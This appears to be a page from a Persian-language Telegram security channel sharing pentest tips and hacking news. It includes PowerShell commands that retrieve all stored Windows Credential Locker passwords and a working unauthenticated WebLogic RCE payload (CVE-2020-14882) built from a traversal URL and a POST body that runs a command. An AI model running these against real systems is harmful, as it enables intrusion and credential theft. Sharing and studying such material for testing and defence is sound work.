امنیت اطلاعات
851 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
راهکارهایی برای دور زدن پیامهای 403 و 401

#bugbounty
#pentest


@sec_nerd
رتبه بندی زبانهای برنامه نویسی بر اساس میزان برقی که مصرف میکنند!

https://thenewstack.io/which-programming-languages-use-the-least-electricity/


#programming

@sec_nerd
آسیب پذیری عجیب Tiki Wiki Cms Groupware

CVE-2020-15906


https://github.com/S1lkys/CVE-2020-15906


بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!

#web
#pentest
#writeup


@sec_nerd
Retrieve credentials stored in the Win Credential Locker

PS C:\> [Windows.Security.Credentials.PasswordVault,.,ContentType=WindowsRuntime]
PS C:\> (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll()

#oscp #security #pentest #ps #windows

@sec_nerd
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت

CVE-2020–14882

https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)


https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

#weblogic
#rce
#java


@sec_nerd
دپارتمان امنیت ملی امریکا و FBI طی گزارشی به جزییات عملیات هکرهای ایرانی در سرقت آراء و تاثیرگذاری بر انتخابات امریکا پرداختند.

در این گزارش مشخص شد هکرهای ایرانی با ابزارهایی نظیر Acunetix و sqlmap اقدام به نفوذ به وبسایتهای مرتبط با انتخابات کرده و با کشف مشکلاتی نظیر باگهای sql injection و directory traversal توانستند اطلاعات رای دهندگان را بدست آورند.

این اطلاعات در ارسال ایمیل های فیک از سوی کامیونیتی Proud Boy و تهدید رای دهندگان به رای دادن به نفع ترامپ به کار گرفته شد.

همچنین اعلام شد این هکرها از nordvpn و برخی سرویس های وی پی ان دیگر در این عملیات بهره برده اند.

https://www.bleepingcomputer.com/news/security/fbi-how-iranian-hackers-stole-voter-info-from-state-election-sites/


#news
#iran
#usa


@sec_nerd